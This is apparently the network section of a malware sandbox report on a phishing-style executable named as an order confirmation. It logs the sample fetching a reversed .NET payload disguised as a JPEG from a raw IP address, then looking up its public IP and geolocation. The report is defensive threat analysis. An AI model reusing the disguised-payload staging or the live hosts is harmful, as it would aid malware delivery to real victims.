                                              Apr 12, 2022 20:22:50.444103003 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.454766989 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.454907894 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464237928 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464266062 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464286089 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464307070 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464323997 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464328051 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464381933 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464389086 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464411974 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464431047 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464433908 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464452028 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464473009 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464477062 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464507103 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464524984 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464560032 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464606047 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464874029 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464929104 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464935064 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.464951038 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.464976072 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465001106 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465008020 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465029001 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465050936 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465058088 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465071917 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465075016 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465095043 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465101957 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465116024 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465121031 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465151072 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465163946 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465183973 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465187073 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465205908 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465225935 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465260029 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465281010 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465318918 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465342999 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465363979 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465399027 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465408087 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465466022 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465487957 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465517044 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465523005 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465543985 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465564966 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465567112 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465626001 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465636015 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465693951 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465734005 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465740919 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465783119 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465827942 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465828896 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465851068 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465883970 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465898991 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.465929031 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465950012 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.465979099 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466007948 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466042042 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466051102 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466140985 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466161013 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466190100 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466197014 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466254950 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466284990 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466308117 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466327906 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466371059 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466387987 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466413021 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466434002 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466442108 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466470003 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466484070 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466490984 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466511011 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466531992 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.466542006 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.466614962 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.474935055 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.476495028 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.477718115 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.487224102 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.487373114 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.487925053 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.487957954 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.487993956 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488034010 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488188982 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488224983 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488260031 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488264084 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488296032 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488332033 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488332987 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488368988 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488396883 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488404989 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488440990 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488466978 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488476038 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488507986 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488543987 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488552094 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488579035 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488601923 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488615036 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488651037 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488675117 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488682985 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488718033 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488745928 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488759995 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488794088 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488816023 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488827944 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488892078 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488926888 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488933086 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488964081 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.488979101 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.488998890 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489025116 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489053011 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489061117 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489094973 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489129066 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489139080 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489162922 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489197016 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489204884 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489233017 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489267111 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489279032 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489300966 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489337921 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489346981 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489372015 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489408016 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489415884 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489443064 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489478111 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489487886 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489514112 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489547968 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489558935 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489573002 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489608049 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489640951 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489650011 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489675999 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489708900 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489721060 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489743948 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489778996 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489790916 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489811897 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489845037 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489854097 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489870071 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489902973 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489936113 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.489947081 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.489969969 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490005016 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490015030 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.490039110 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490072966 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490082979 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.490096092 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490128994 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490160942 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490179062 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.490212917 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490247965 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490257978 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.490272045 CEST804973845.137.22.163192.168.2.4
                                              Apr 12, 2022 20:22:50.490314007 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.510576010 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:22:50.510952950 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:23:20.012459040 CEST4973880192.168.2.445.137.22.163
                                              Apr 12, 2022 20:23:21.345618963 CEST4974580192.168.2.4193.122.6.168
                                              Apr 12, 2022 20:23:21.363430977 CEST8049745193.122.6.168192.168.2.4
                                              Apr 12, 2022 20:23:21.363646030 CEST4974580192.168.2.4193.122.6.168
                                              Apr 12, 2022 20:23:21.364192009 CEST4974580192.168.2.4193.122.6.168
                                              Apr 12, 2022 20:23:21.381840944 CEST8049745193.122.6.168192.168.2.4
                                              Apr 12, 2022 20:23:21.384188890 CEST8049745193.122.6.168192.168.2.4
                                              Apr 12, 2022 20:23:21.427567005 CEST4974580192.168.2.4193.122.6.168
                                              Apr 12, 2022 20:23:21.446513891 CEST8049745193.122.6.168192.168.2.4
                                              Apr 12, 2022 20:23:21.636267900 CEST4974580192.168.2.4193.122.6.168
                                              Apr 12, 2022 20:23:23.116080046 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:23.116120100 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:23.116297960 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:23.174719095 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:23.174738884 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:23.219665051 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:23.219795942 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:23.236771107 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:23.236799955 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:23.237152100 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:23.442209005 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:23.444324017 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:24.122888088 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:24.165452003 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:24.245906115 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:24.245929956 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:24.252763987 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:24.253382921 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:24.253417015 CEST44349746188.114.97.7192.168.2.4
                                              Apr 12, 2022 20:23:24.253582001 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:23:24.253604889 CEST49746443192.168.2.4188.114.97.7
                                              Apr 12, 2022 20:24:26.446031094 CEST8049745193.122.6.168192.168.2.4
                                              Apr 12, 2022 20:24:26.446183920 CEST4974580192.168.2.4193.122.6.168
                                              Apr 12, 2022 20:25:01.448715925 CEST4974580192.168.2.4193.122.6.168
                                              Apr 12, 2022 20:25:01.466573954 CEST8049745193.122.6.168192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Apr 12, 2022 20:23:21.209454060 CEST5817153192.168.2.48.8.8.8
                                              Apr 12, 2022 20:23:21.228760958 CEST53581718.8.8.8192.168.2.4
                                              Apr 12, 2022 20:23:21.295525074 CEST5759453192.168.2.48.8.8.8
                                              Apr 12, 2022 20:23:21.312784910 CEST53575948.8.8.8192.168.2.4
                                              Apr 12, 2022 20:23:23.079452991 CEST6051253192.168.2.48.8.8.8
                                              Apr 12, 2022 20:23:23.102564096 CEST53605128.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Apr 12, 2022 20:23:21.209454060 CEST192.168.2.48.8.8.80x62d5Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.295525074 CEST192.168.2.48.8.8.80x3ccbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:23.079452991 CEST192.168.2.48.8.8.80x838bStandard query (0)freegeoip.appA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Apr 12, 2022 20:23:21.228760958 CEST8.8.8.8192.168.2.40x62d5No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                              Apr 12, 2022 20:23:21.228760958 CEST8.8.8.8192.168.2.40x62d5No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.228760958 CEST8.8.8.8192.168.2.40x62d5No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.228760958 CEST8.8.8.8192.168.2.40x62d5No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.228760958 CEST8.8.8.8192.168.2.40x62d5No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.228760958 CEST8.8.8.8192.168.2.40x62d5No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.312784910 CEST8.8.8.8192.168.2.40x3ccbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                              Apr 12, 2022 20:23:21.312784910 CEST8.8.8.8192.168.2.40x3ccbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.312784910 CEST8.8.8.8192.168.2.40x3ccbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.312784910 CEST8.8.8.8192.168.2.40x3ccbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.312784910 CEST8.8.8.8192.168.2.40x3ccbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:21.312784910 CEST8.8.8.8192.168.2.40x3ccbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:23.102564096 CEST8.8.8.8192.168.2.40x838bNo error (0)freegeoip.app188.114.97.7A (IP address)IN (0x0001)
                                              Apr 12, 2022 20:23:23.102564096 CEST8.8.8.8192.168.2.40x838bNo error (0)freegeoip.app188.114.96.7A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • freegeoip.app
                                              • 45.137.22.163
                                              • checkip.dyndns.org

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.449746188.114.97.7443C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.44973845.137.22.16380C:\Users\user\Desktop\order confirmation 46574 -QT-04-0022.exe
                                              TimestampkBytes transferredDirectionData
                                              Apr 12, 2022 20:22:50.147593975 CEST646OUTGET /order_confirmation_46574_-QT-04-0022_Yszciyqc.jpg HTTP/1.1
                                              Host: 45.137.22.163
                                              Connection: Keep-Alive
                                              Apr 12, 2022 20:22:50.172700882 CEST647INHTTP/1.1 200 OK
                                              Content-Type: image/jpeg
                                              Last-Modified: Tue, 12 Apr 2022 02:12:56 GMT
                                              Accept-Ranges: bytes
                                              ETag: "20b7f0d2124ed81:0"
                                              Server: Microsoft-IIS/8.5
                                              Date: Tue, 12 Apr 2022 18:22:50 GMT
                                              Content-Length: 1412608
                                              Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 f0 00 00 00 0c 00 15 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 00 38 00 33 00 39 00 2e 00 37 00 33 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0e 00 44 00 00 00 32 00 38 00 33 00 39 00 2e 00 37 00 33 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0e 00 40 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 71 00 78 00 66 00 66 00 73 00 73 00 75 00 75 00 6d 00 6b 00 7a 00 50 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 11 00 4a 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 71 00 78 00 66 00 66 00 73 00 73 00 75 00 75 00 6d 00 6b 00 7a 00 50 00 00 00 65 00 6d 00 61 00 4e 00 6c 00 61 00 6e 00 72 00 65 00 74 00 6e 00 49 00 01 00 11 00 42 00 00 00 32 00 38 00 33 00 39 00 2e 00 37 00 33 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 65 00
                                              Data Ascii: 42839.7318.0.1noisreV ylbmessAD2839.7318.0.1noisreVtcudorP@emaNtcudorP"lld.qxffssuumkzPemaneliFlanigirOJskramedarTlageL*thgirypoClageL&lld.qxffssuumkzPemaNlanretnIB2839.7318.0.1noisreVe
                                              Apr 12, 2022 20:22:50.172758102 CEST649INData Raw: 6c 00 69 00 46 00 01 00 0e 00 3c 00 00 00 00 00 00 00 00 00 6e 00 6f 00 69 00 74 00 70 00 69 00 72 00 63 00 73 00 65 00 44 00 65 00 6c 00 69 00 46 00 01 00 01 00 2a 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 79 00 6e 00 61 00 70 00 6d 00
                                              Data Ascii: liF<noitpircseDeliF*emaNynapmoC"stnemmoC0b400000LofnIeliFgnirtSpnoitalsnarT$ofnIeliFraV
